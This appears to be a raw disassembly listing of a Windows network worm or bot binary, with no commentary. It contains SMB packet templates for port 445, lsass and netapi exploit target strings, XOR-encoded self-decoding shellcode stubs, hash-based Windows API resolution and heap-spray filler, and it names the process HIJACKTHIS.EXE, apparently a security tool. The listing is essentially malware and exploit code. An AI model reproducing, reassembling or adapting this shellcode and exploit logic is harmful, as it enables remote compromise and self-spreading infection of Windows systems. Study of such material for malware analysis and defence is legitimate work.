dd 20404000h, 4010h, 404000h, 20404000h, 20000000h, 20004000h
dd 10h, 20400010h, 404000h, 20404010h, 400000h, 4010h
dd 20000010h, 400000h, 20004000h, 20000000h, 4010h, 20000010h
dd 20404010h, 404000h, 20400000h, 404010h, 20404000h, 0
dd 20400010h, 10h, 4000h, 20400000h, 404010h, 4000h, 400010h
dd 20004010h, 0
dd 20404000h, 20000000h, 400010h, 20004010h
dword_41EA28 dd 200000h ; DATA XREF: sub_405289+C6�r
; sub_405289+156�r
dd 4200002h, 4000802h, 0
dd 800h, 4000802h, 200802h, 4200800h, 4200802h, 200000h
dd 0
dd 4000002h, 2, 4000000h, 4200002h, 802h, 4000800h, 200802h
dd 200002h, 4000800h, 4000002h, 4200000h, 4200800h, 200002h
dd 4200000h, 800h, 802h, 4200802h, 200800h, 2, 4000000h
dd 200800h, 4000000h, 200800h, 200000h, 2 dup(4000802h)
dd 2 dup(4200002h), 2, 200002h, 4000000h, 4000800h, 200000h
dd 4200800h, 802h, 200802h, 4200800h, 802h, 4000002h, 4200802h
dd 4200000h, 200800h, 0
dd 2, 4200802h, 0
dd 200802h, 4200000h, 800h, 4000002h, 4000800h, 800h, 200002h
dword_41EB28 dd 10001040h ; DATA XREF: sub_405289+107�r
; sub_405289+197�r
dd 1000h, 40000h, 10041040h, 10000000h, 10001040h, 40h
dd 10000000h, 40040h, 10040000h, 10041040h, 41000h, 10041000h
dd 41040h, 1000h, 40h, 10040000h, 10000040h, 10001000h
dd 1040h, 41000h, 40040h, 10040040h, 10041000h, 1040h
dd 2 dup(0)
dd 10040040h, 10000040h, 10001000h, 41040h, 40000h, 41040h
dd 40000h, 10041000h, 1000h, 40h, 10040040h, 1000h, 41040h
dd 10001000h, 40h, 10000040h, 10040000h, 10040040h, 10000000h
dd 40000h, 10001040h, 0
dd 10041040h, 40040h, 10000040h, 10040000h, 10001000h
dd 10001040h, 0
dd 10041040h, 2 dup(41000h), 2 dup(1040h), 40040h, 10000000h
dd 10041000h, 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
dd 30B0005h, 10h, 48h, 1, 16D016D0h, 0
dd 1, 10000h, 0AFA8BD80h, 11C97D8Ah, 8F4BEh, 8929102Bh
dd 1, 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 0
dd 3000005h, 10h, 18h, 1, 3 dup(0)
; ---------------------------------------------------------------------------
mov al, 1
push edx
xchg eax, edi
retf 0D059h
; ---------------------------------------------------------------------------
db 11h
dd 0A000D5A8h, 51800DC9h, 0
dd 1D55B526h, 46C5C137h, 8F6379ABh, 69E8682Ah, 0
dd 44000081h, 464B4320h, 454E4544h, 45444643h, 46434646h
dd 46464547h, 43414343h, 2 dup(43414341h), 45200041h, 4644454Bh
dd 45494545h, 43414344h, 4 dup(43414341h), 414141h, 0
dd 2F000000h, 424D53FFh, 72h, 4 dup(0)
dd 25C0000h, 0
dd 2000C00h, 4C20544Eh, 2E30204Dh, 3231h, 48000000h, 424D53FFh
dd 73h, 4 dup(0)
dd 25C0000h, 0
dd 0FF0Dh, 2FFFF00h, 25C00h, 2 dup(0)
dd 1000000h, 0B000000h, 4A000000h, 54410043h, 434854h
dd 0
dd 3E8h
off_41EE1C dd offset aHijackthis_exe ; DATA XREF: sub_409427+D1�r
; "HIJACKTHIS.EXE"
dd offset aWindowspatch32 ; "WINDOWSPATCH32.EXE"
align 8
dword_41EE28 dd 7474656Ch ; DATA XREF: sub_409C91+F�r
dd 7265h, 0
dword_41EE34 dd 0 ; DATA XREF: sub_409C91:loc_409CB8�r
off_41EE38 dd offset sub_409C44 ; DATA XREF: sub_409C91+4A�r
aAllnick db 'allnick',0
align 8
dd 1, 409CEAh
aAs445 db 'as445',0 ; DATA XREF: sub_40AD8F+153�o
align 4
db 2 dup(0)
aAsn445 db 'asn|445',0 ; DATA XREF: .text:0040B8D2�o
; sub_40C878+19E�o
align 4
dd 5 dup(0)
dword_41EE78 dd 1BDh ; DATA XREF: sub_40198E+19B8�r
; sub_40198E+19D3�o ...
off_41EE7C dd offset sub_40C878 ; DATA XREF: sub_40AD8F+1D5�r
dword_41EE80 dd 0 ; DATA XREF: .text:0040B907�r
; sub_40C878+1CF�r ...
align 8
dd 1, 33317361h, 39h, 73610000h, 33317C6Eh, 39h, 5 dup(0)
dd 8Bh, 40C878h, 2 dup(0)
dd 1, 636E76h, 0
dd 6E760000h, 39357C63h, 3030h, 5 dup(0)
dd 170Ch, 40CF9Ah, 2 dup(0)
dd 1, 3434736Ch, 35h, 736C0000h, 7C737361h, 353434h, 5 dup(0)
dd 1BDh, 40B75Fh, 2 dup(0)
dd 1, 6D7973h, 0
dd 79730000h, 6Dh, 6 dup(0)
dd 0B97h, 40CB53h, 2 dup(0)
dd 1, 0Fh dup(0)
; ---------------------------------------------------------------------------
jmp short loc_41EFCA
; =============== S U B R O U T I N E =======================================
sub_41EFBA proc far ; CODE XREF: sub_41EFBA:loc_41EFCA�p
pop ebx
dec ebx
xor ecx, ecx
mov cx, 125h
loc_41EFC2: ; CODE XREF: sub_41EFBA+C�j
xor byte ptr [ebx+ecx], 99h
loop loc_41EFC2
jmp short loc_41EFCF
; ---------------------------------------------------------------------------
loc_41EFCA: ; CODE XREF: .text:0041EFB8�j
call near ptr sub_41EFBA
loc_41EFCF: ; CODE XREF: sub_41EFBA+E�j
jo short loc_41F033
cdq
cdq
cdq
mov ch, 38h
test eax, 12999999h
fst dword ptr [ebp+3485E912h]
adc dh, cl
xchg eax, ecx
adc ch, [esi-0Dh]
popf
sal byte ptr [ecx+2], 99h
cdq
cdq
jnp short loc_41F051
icebp
stosb
stosd
cdq
cdq
icebp
out dx, al
jmp far ptr 128Fh:66CDC6ABh
; ---------------------------------------------------------------------------
db 71h
dd 71C09DF3h, 9999991Bh, 7518607Bh, 99999809h, 9898F1CDh
dd 0CF669999h, 0C9C9C989h, 0D9C9D9C9h, 8DCF66C9h, 0E6F14112h
dd 0F1989999h, 4B9D999Bh
; ---------------------------------------------------------------------------
adc dl, [ebp-0Dh]
loc_41F033: ; CODE XREF: sub_41EFBA:loc_41EFCF�j
mov eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dd 0EC591C81h, 0F4FAF1D3h, 0FF1099FDh, 0CD751AA9h, 0F3BDA514h
dd 7B32C08Ch
db 64h
; ---------------------------------------------------------------------------
loc_41F051: ; CODE XREF: sub_41EFBA+35�j
pop edi
fnstsw word ptr [ebp-22982277h]
mov ebp, 0BDC510A4h
rcl dword ptr [eax], 1
lds edi, [ebp-423AEF2Bh]
leave
adc al, 0DDh
mov ebp, 0C8C9CD89h
enter 0FFFFF3C8h, 98h
enter 66C8h, 0EFh
test eax, 9DCF66C8h
adc dl, [ebp-0Dh]
db 66h, 66h
test al, 66h
iret
sub_41EFBA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg eax, ecx
retf 0CF66h
; ---------------------------------------------------------------------------
dw 6685h
dd 0CFC895CFh, 12A5DC12h, 9AE1B1CDh, 0EB12CB4Ch, 0AA6C9AB9h
dd 34D8D050h, 42AA5C9Ah, 0A3892796h, 5891ED4Fh, 439A9452h
dd 0A26872D9h, 0C37EEC86h, 9ABDC312h, 9512FF44h, 85C312D2h
dd 9D12449Ah, 325C9A12h, 715AC0C7h, 66666699h, 7597D717h
dd 8F2A67EBh, 579C4034h, 0F9795776h, 0A2657452h, 346C9040h
dd 0F9336075h, 0E05FE07Eh, 0
; ---------------------------------------------------------------------------
loc_41F0F8: ; DATA XREF: sub_40B31C+159�o
; sub_40B31C+216�o
jmp short loc_41F10A
; =============== S U B R O U T I N E =======================================
sub_41F0FA proc near ; CODE XREF: sub_41F0FA:loc_41F10A�p
pop edx
dec edx
xor ecx, ecx
mov cx, 17Dh
loc_41F102: ; CODE XREF: sub_41F0FA+C�j
xor byte ptr [edx+ecx], 99h
loop loc_41F102
jmp short loc_41F10F
; ---------------------------------------------------------------------------
loc_41F10A: ; CODE XREF: .text:loc_41F0F8�j
call sub_41F0FA
loc_41F10F: ; CODE XREF: sub_41F0FA+E�j
jo short near ptr dword_41F088+1Eh
cwde
cdq
cdq
retn
sub_41F0FA endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0FDh, 38h, 0A9h
dd 12999999h, 0E91295D9h, 0D9123485h, 12411291h, 0ED12A5EAh
dd 6A9AE187h, 9AB9E712h, 8DD71262h, 0CECF74AAh, 9AA612C8h
dd 0F36B1262h, 3F6AC097h, 0C6C091EDh, 0DC9D5E1Ah, 0C6C0707Bh
dd 125412C7h, 5A9ABDDFh, 589A7848h, 12FF50AAh, 85DF1291h
dd 78585A9Ah, 12589A9Bh, 125A9A99h, 1A6E1263h, 4912975Fh
dd 71C09AF3h, 9999991Eh, 0CB945F1Ah, 65CE66CFh, 0F34112C3h
dd 0ED71C09Ch, 0C9999999h, 0F3C9C9C9h, 669BF398h, 411275CEh
dd 999B9E5Eh
dword_41F1A8 dd 59AA4B9Dh, 0F39DDE10h, 66CACE89h, 98F369CEh, 6DCE66CAh
; DATA XREF: sub_40B31C+108�o
dd 66CAC9C9h, 491261CEh, 12DD751Ah, 0F359AA6Dh, 9D10C089h
dd 10627B17h, 0CF10A1CFh, 0D9CF10A5h, 0B5DF5EFFh, 0DE149898h
dd 0AACFC989h, 0C8C8C850h, 0C8C898F3h, 0FAA5DE5Eh, 1499FDF4h
dd 0C8C9A5DEh, 0CB79CE66h, 0CA65CE66h, 0C965CE66h, 0AA7DCE66h
dd 591C3559h, 0CBC860ECh, 4B66CACFh, 7B32C0C3h, 5A59AA77h
dd 66677671h, 0EDFCDE66h, 0FAF6EBC9h, 0EBFDFDD8h, 99EAEAFCh
dd 0F8FCEBDAh, 0EBC9FCEDh, 0EAFCFAF6h, 0DC99D8EAh, 0CDEDF0E1h
dd 0F8FCEBF1h, 0F6D599FDh, 0F0D5FDF8h, 0EBF8EBFBh, 0EE99D8E0h
dd 0AAC6ABEAh, 0CACE99ABh, 0FAF6CAD8h, 0D8EDFCF2h, 0F7F0FB99h
dd 0F0F599FDh, 0F7FCEDEAh, 0FAFAF899h, 99EDE9FCh, 0EAF6F5FAh
dd 0FAF6EAFCh, 99EDFCF2h, 0
dword_41F290 dd 85000000h, 424D53FFh, 72h, 0C8531800h, 3 dup(0)
; DATA XREF: .text:0040B7E4�o
dd 0FEFF0000h, 0
dd 2006200h
aPcNetworkProgr db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWorkg db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 2 dup(0)
dword_41F320 dd 0A4000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040B810�o
dd 0FEFF0000h, 100000h, 0A400FF0Ch, 0A110400h, 0
dd 20000000h, 0
dd 0D400h, 4E006980h, 534D4C54h, 1005053h, 97000000h, 0E00882h
dd 4 dup(0)
aWindows2000219:
unicode 0, <Windows 2000 2195>,0
aWindows20005_0:
unicode 0, <Windows 2000 5.0>,0
align 10h
dword_41F3D0 dd 0DA000000h, 424D53FFh, 73h, 0C8071800h, 3 dup(0)
; DATA XREF: .text:0040B837�o
dd 0FEFF0000h, 200800h, 0DA00FF0Ch, 0A110400h, 0
dd 57000000h, 0
dd 0D400h, 4E009F80h, 534D4C54h, 3005053h, 1000000h, 46000100h
dd 0
dd 47000000h, 0
dd 40000000h, 0
dd 40000000h, 6000000h, 40000600h, 10000000h, 47001000h
dd 15000000h, 48E0888Ah, 44004F00h, 19810000h, 0E4F27A6Ah
dd 0AF281C49h, 10742530h, 575367h, 6E0069h, 6F0064h, 730077h
dd 320020h, 300030h, 200030h, 310032h, 350039h, 570000h
dd 6E0069h, 6F0064h, 730077h, 320020h, 300030h, 200030h
dd 2E0035h, 30h, 0
dword_41F4B0 dd 5C000000h, 424D53FFh, 75h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B31C+59�o
dd 0FEFF0000h, 300800h, 5C00FF04h, 1000800h, 3100h, 5C005Ch
dd 390031h, 2E0032h, 360031h, 2E0038h, 2E0031h, 310032h
dd 5C0030h, 500049h
aC: ; DATA XREF: sub_40B31C+8B�o
unicode 0, <C$>,0
a????? db '?????',0
dd 2 dup(0)
dword_41F518 dd 64000000h, 424D53FFh, 0A2h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B31C+2AE�o
dd 4DC0800h, 400800h, 0DE00FF18h, 0E00DEh, 16h, 0
dd 2019Fh, 3 dup(0)
dd 3, 1, 40h, 2, 1103h, 6C005Ch, 610073h, 700072h, 63h
dd 2 dup(0)
dword_41F588 dd 9C000000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B31C+2D5�o
dd 4DC0800h, 500800h, 48000010h, 0
dd 4, 2 dup(0)
dd 48005400h, 2005400h, 2600h, 10005940h, 50005Ch, 500049h
dd 5C0045h, 0
dd 30B0005h, 10h, 48h, 1, 10B810B8h, 0
dd 1, 10000h, 3919286Ah, 11D0B10Ch, 0C000A89Bh, 0F52ED94Fh
dd 0
dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 2, 2 dup(0)
dword_41F630 dd 0F40C0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B31C+3B4�o
dd 4DC0800h, 600800h, 0A0000010h, 0Ch, 4, 2 dup(0)
dd 0A0005400h, 200540Ch, 2600h, 100CB140h, 50005Ch, 500049h
dd 5C0045h, 0
dd 3000005h, 10h, 0CA0h, 1, 0C88h, 90000h, 3ECh, 0
dd 3ECh, 0
off_41F6B0 dd offset loc_401495 ; DATA XREF: sub_40B31C+3E2�o
dd 3, 40707Ch, 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd offset loc_40707C
dd 1, 0
dd 1, 0
dd 138578h, 0E9A65BABh, 2 dup(0)
dword_41F748 dd 0F8100000h, 424D53FFh, 2Fh, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B31C+30A�o
dd 0FEFF0800h, 600800h, 0DE00FF0Eh, 4000DEh, 0FF000000h
dd 8FFFFFFh, 10B800h, 4010B800h, 0
dd 0EE10B900h, 1000005h, 10h, 10B8h, 1, 200Ch, 90000h
dd 0DADh, 0
dd 0DADh, 2 dup(0)
dword_41F7B8 dd 0D80F0000h, 424D53FFh, 25h, 0C8071800h, 3 dup(0)
; DATA XREF: sub_40B31C+335�o
dd 1180800h, 700800h, 84000010h, 0Fh, 4, 2 dup(0)
dd 84005400h, 200540Fh, 2600h, 0F9540h, 50005Ch, 500049h
dd 5C0045h, 0
dd 2000005h, 10h, 0F84h, 1, 0F6Ch, 90000h, 2 dup(0)
dword_41F830 dd 0 ; DATA XREF: sub_40B31C+363�o
dd offset loc_40A894+6
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd 1, 0
dd offset loc_40A894+6
dd 1, 0
dd 1, 0
dd offset loc_40A894+6
dd 1, 0
dd 1, 0
dd offset loc_40A894+6
dd 1, 0
dd 1, 3 dup(0)
aWinxpProfessio db 'WinXP Professional [universal] lsass.exe ',0
align 10h
dword_41F8F0 dd 1004600h ; DATA XREF: sub_40B31C+141�r
; sub_40B31C+249�r
dd 1, 326E6957h, 7250206Bh, 7365666Fh, 6E6F6973h, 20206C61h
dd 755B2020h, 6576696Eh, 6C617372h, 656E205Dh, 70617274h
dd 6C6C642Eh, 2 dup(0)
dd 7515123Ch, 2, 326E6957h, 6441206Bh, 636E6176h, 53206465h
dd 65767265h, 535B2072h, 205D3450h, 20202020h, 656E2020h
dd 70617274h, 6C6C642Eh, 2 dup(0)
dd 751C123Ch, 0Fh dup(0)
dword_41F9A8 dd 7FFDF020h, 0 ; DATA XREF: sub_40BB9B+162�o
byte_41F9B0 db 90h ; DATA XREF: sub_40BB9B+AF�o
db 42h, 90h, 42h
db 90h
dd offset word_429042
align 4
dword_41F9BC dd 10FF8h ; DATA XREF: sub_40BB9B+79�o
dword_41F9C0 dd 10FF8h, 0 ; DATA XREF: sub_40BB9B+6A�o
dword_41F9C8 dd 424D53FFh, 72h, 0C8531800h, 3 dup(0) ; DATA XREF: sub_40BFB5+7B�o
dd 13370000h, 0
dd 2006200h
aPcNetworkPro_0 db 'PC NETWORK PROGRAM 1.0',0
db 2
db 4Ch ; L
db 41h, 4Eh, 4Dh
db 41h ; A
db 4Eh, 31h, 2Eh
db 30h ; 0
align 2
dw 5702h
aIndowsForWor_0 db 'indows for Workgroups 3.1a',0
db 2
dd 2E314D4Ch, 30305832h, 4C020032h, 414D4E41h, 312E324Eh
dd 544E0200h, 204D4C20h, 32312E30h, 0
dword_41FA50 dd 0 ; DATA XREF: sub_40BFB5+44�o
dd 800000D4h, 0
dword_41FA5C dd 424D53FFh, 73h, 0C8071800h, 3 dup(0) ; DATA XREF: sub_40BFB5+34�o
dd 13370000h, 0
dd 0FF0Ch, 0A110400h, 3 dup(0)
unk_41FA90 db 81h ; ; DATA XREF: sub_40C08F+A�o
db 2 dup(0), 44h
aCkfdenecfdeffc db ' CKFDENECFDEFFCFGEFFCCACACACACACA',0
aCacacacacacaca db ' CACACACACACACACACACACACACACACAAA',0
align 10h
byte_41FAE0 db 41h ; DATA XREF: sub_40C62F+10A�r
aBcdefghijklmno db 'BCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/',0
align 8
; =============== S U B R O U T I N E =======================================
sub_41FB28 proc near ; DATA XREF: sub_40C878+82�o
push ebx
push esi
push edi
sub sp, 80h
mov esi, esp
call sub_41FC24
push dword ptr [esi]
push 63D61209h
call sub_41FC3A
mov [esi+8], eax
call sub_41FBED
push dword ptr [esi+4]
push 0CA2BD06Bh
call sub_41FC3A
mov [esi+0Ch], eax
call sub_41FB9F
push dword ptr [esi+4]
push 4C0297FAh
call sub_41FC3A
xor ebx, ebx
push 410h
push ebx
call eax
mov ebx, eax
push esi
mov esi, [esi+10h]
mov edi, eax
mov ecx, 410h
rep movsb
pop esi
xor eax, eax
push eax
push eax
push eax
push ebx
push eax
push eax
call dword ptr [esi+0Ch]
mov eax, [esi+8]
add sp, 80h
pop edi
pop esi
pop ebx
jmp eax
sub_41FB28 endp
; =============== S U B R O U T I N E =======================================
sub_41FB9F proc near ; CODE XREF: sub_41FB28+33�p
var_20 = dword ptr -20h
var_14 = dword ptr -14h
pusha
call sub_41FBC8
mov eax, [esp+20h+var_14]
lea ebx, [eax+7Ch]
add dword ptr [ebx+3Ch], 5
add dword ptr [ebx+28h], 1000h
and dword ptr [ebx+28h], 0FFFFF000h
mov eax, [esp+20h+var_20]
add esp, 14h
push eax
xor eax, eax
retn
sub_41FB9F endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41FBC8 proc near ; CODE XREF: sub_41FB9F+1�p
xor edx, edx
push dword ptr fs:[edx]
mov fs:[edx], esp
xor ebx, ebx
mov eax, 42904290h
loc_41FBD7: ; CODE XREF: sub_41FBC8+1A�j
xor ecx, ecx
mov cl, 2
mov edi, ebx
repe scasd
jz short loc_41FBE4
inc ebx
jmp short loc_41FBD7
; ---------------------------------------------------------------------------
loc_41FBE4: ; CODE XREF: sub_41FBC8+17�j
mov [esi+10h], edi
pop dword ptr fs:[edx]
pop eax
popa
retn
sub_41FBC8 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41FBED proc near ; CODE XREF: sub_41FB28+1E�p
pusha
mov edi, 7FFDF020h
mov ebx, [edi]
mov eax, [esi+8]
mov [edi], eax
mov edi, [edi-8]
add edi, 178h
mov ecx, edi
loc_41FC05: ; CODE XREF: sub_41FBED+1E�j
cmp [ecx], ebx
jz short loc_41FC0D
mov ecx, [ecx]
jmp short loc_41FC05
; ---------------------------------------------------------------------------
loc_41FC0D: ; CODE XREF: sub_41FBED+1A�j
mov edx, edi
loc_41FC0F: ; CODE XREF: sub_41FBED+2A�j
cmp [edx+4], ebx
jz short loc_41FC19
mov edx, [edx+4]
jmp short loc_41FC0F
; ---------------------------------------------------------------------------
loc_41FC19: ; CODE XREF: sub_41FBED+25�j
mov [ecx], edx
mov [edx+4], ecx
mov byte ptr [ebx-3], 1
popa
retn
sub_41FBED endp
; =============== S U B R O U T I N E =======================================
sub_41FC24 proc near ; CODE XREF: sub_41FB28+A�p
mov eax, ds:7FFDF00Ch
mov eax, [eax+1Ch]
mov ebx, [eax+8]
mov [esi], ebx
mov eax, [eax]
mov eax, [eax+8]
mov [esi+4], eax
retn
sub_41FC24 endp
; =============== S U B R O U T I N E =======================================
sub_41FC3A proc near ; CODE XREF: sub_41FB28+16�p
; sub_41FB28+2B�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
pusha
mov ebp, [esp+20h+arg_4]
mov eax, [ebp+3Ch]
mov edx, [ebp+eax+78h]
add edx, ebp
mov ecx, [edx+18h]
mov ebx, [edx+20h]
add ebx, ebp
loc_41FC50: ; CODE XREF: sub_41FC3A+33�j
jecxz short loc_41FC8A
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor edi, edi
xor eax, eax
cld
loc_41FC5D: ; CODE XREF: sub_41FC3A+2D�j
lodsb
cmp al, ah
jz short loc_41FC69
ror edi, 0Dh
add edi, eax
jmp short loc_41FC5D
; ---------------------------------------------------------------------------
loc_41FC69: ; CODE XREF: sub_41FC3A+26�j
cmp edi, [esp+20h+arg_0]
jnz short loc_41FC50
mov ebx, [edx+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edx+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
popa
retn 8
; ---------------------------------------------------------------------------
loc_41FC8A: ; CODE XREF: sub_41FC3A:loc_41FC50�j
; sub_41FC3A:loc_41FC8A�j
jmp short loc_41FC8A
sub_41FC3A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41FC90 proc near ; DATA XREF: sub_40C878+30�o
arg_0 = dword ptr 4
add esp, 0FFFFF254h
cld
call sub_41FCE2
mov eax, [ebp+3Ch]
mov edi, [ebp+eax+78h]
add edi, ebp
mov ecx, [edi+18h]
mov ebx, [edi+20h]
add ebx, ebp
loc_41FCAD: ; CODE XREF: sub_41FC90+38�j
jecxz short loc_41FCDD
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
xor eax, eax
cdq
loc_41FCB8: ; CODE XREF: sub_41FC90+32�j
lodsb
test al, al
jz short loc_41FCC4
ror edx, 0Dh
add edx, eax
jmp short loc_41FCB8
; ---------------------------------------------------------------------------
loc_41FCC4: ; CODE XREF: sub_41FC90+2B�j
cmp edx, [esp+arg_0]
jnz short loc_41FCAD
mov ebx, [edi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edi+1Ch]
add ebx, ebp
mov ebx, [ebx+ecx*4]
add ebx, ebp
loc_41FCDD: ; CODE XREF: sub_41FC90:loc_41FCAD�j
mov [esp+arg_0], ebx
retn
sub_41FC90 endp
; =============== S U B R O U T I N E =======================================
sub_41FCE2 proc near ; CODE XREF: sub_41FC90+7�p
; FUNCTION CHUNK AT 0041FD1A SIZE 0000000B BYTES
xor eax, eax
mov eax, fs:[eax+30h]
test eax, eax
js short loc_41FCFB
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov ebp, [eax+8]
jmp loc_41FD06
; ---------------------------------------------------------------------------
loc_41FCFB: ; CODE XREF: sub_41FCE2+8�j
mov eax, [eax+34h]
add eax, 7Ch
mov ebp, [eax+3Ch]
loc_41FD06: ; CODE XREF: sub_41FCE2+14�j
pop edi
xor esi, esi
pusha
push esi
jmp short loc_41FD1A
sub_41FCE2 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41FD0D proc near ; CODE XREF: sub_41FCE2:loc_41FD1A�p
push 60E0CEEFh
push 0E8AFE98h
push edi
jmp edi
sub_41FD0D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41FCE2
loc_41FD1A: ; CODE XREF: sub_41FCE2+29�j
call sub_41FD0D
loc_41FD1F: ; DATA XREF: .text:0040CBAD�o
add [ecx], al
adc [edi], cl
and [edx], cl
; END OF FUNCTION CHUNK FOR sub_41FCE2
; ---------------------------------------------------------------------------
db 3 dup(0)
dd 1001802h, 0
dd 14002400h, 0D9D2C9B7h, 34EF333Eh, 431F25h, 2F5C0202h
dd 3Fh dup(61616161h), 62616161h, 40h dup(62626262h), 22220101h
dd 3Fh dup(22222222h), 1222222h, 64646401h, 3Fh dup(64646464h)
dd 1016464h, 40h dup(65656565h), 66010165h, 40h dup(66666666h)
dd 67670101h, 3Fh dup(67676767h), 1676767h, 68686801h
dd 3Fh dup(68686868h), 1016868h, 40h dup(69696969h), 6A010169h
dd 40h dup(6A6A6A6Ah), 6B6B0101h, 3Fh dup(6B6B6B6Bh), 16B6B6Bh
dd 6C6C6C01h, 8 dup(6C6C6C6Ch), 41416C6Ch, 100D06EBh, 6D6D501Eh
dd 0E983C933h, 0D9EED9B0h, 5BF42474h, 0C8137381h, 83877FD9h
dd 0F4E2FCEBh, 0CA94B334h, 78802020h, 0EBF4B937h, 0C2F4FDECh
dd 820352F4h, 0C90D8B0h, 0D8F4C187h, 0CE94D8E8h, 86F4ED43h
dd 1EBFE826h, 0F3BF5D64h, 8AB518CFh, 73941BC9h, 0AF5B8DF3h
dd 0D8F43CBDh, 0E194D8ECh, 0C34D543h, 6C7EC597h, 0EF4F5CBh
dd 0E663FDA4h, 0E3A4E80Bh, 0C4F9A43h, 0F7F4D588h, 0C7F474D4h
dd 91787C0h, 0D793D786h, 0D4190F37h, 0B54CB1AEh, 0B50CAEA0h
dd 57808D97h, 7B9212A0h, 518089F3h, 0E19A5097h, 85773449h
dd 787DB39Dh, 8EA6B118h, 7828743Dh, 0D42C8A1Eh, 0D43C8A9Bh
dd 57808A8Bh, 0EC5EB1AEh, 66F68AAEh, 9DDBB15Dh, 78281EB8h
dd 0D66FB31Eh, 0EFAF269Dh, 6E51746Ch, 0D4A9269Fh, 0EFAF269Dh
dd 0CEF9902Dh, 0D7A9269Fh, 782A8D9Ch, 60174A18h, 0D0061FB1h
dd 782A0F37h, 0E315BF18h, 0EA1CB1AEh, 0D7153C41h, 0EB3F091h
dd 0E3BB32Fh, 74BFE82Ah, 0AA3D2762h, 14539B36h, 2C47A345h
dd 0F5177263h, 78696A36h, 51809DBDh, 0D62D8E93h, 86158899h
dd 0D62A8899h, 2A170937h, 0D4B1DC11h, 78150F37h, 5780EE37h
dd 4838E43h, 5180BD0Ch, 0EFAF269Ah, 0D87B5338h, 78A9269Bh
dd 877FD918h
aMmmmmmmmmmmmmm db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
db 'mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm'
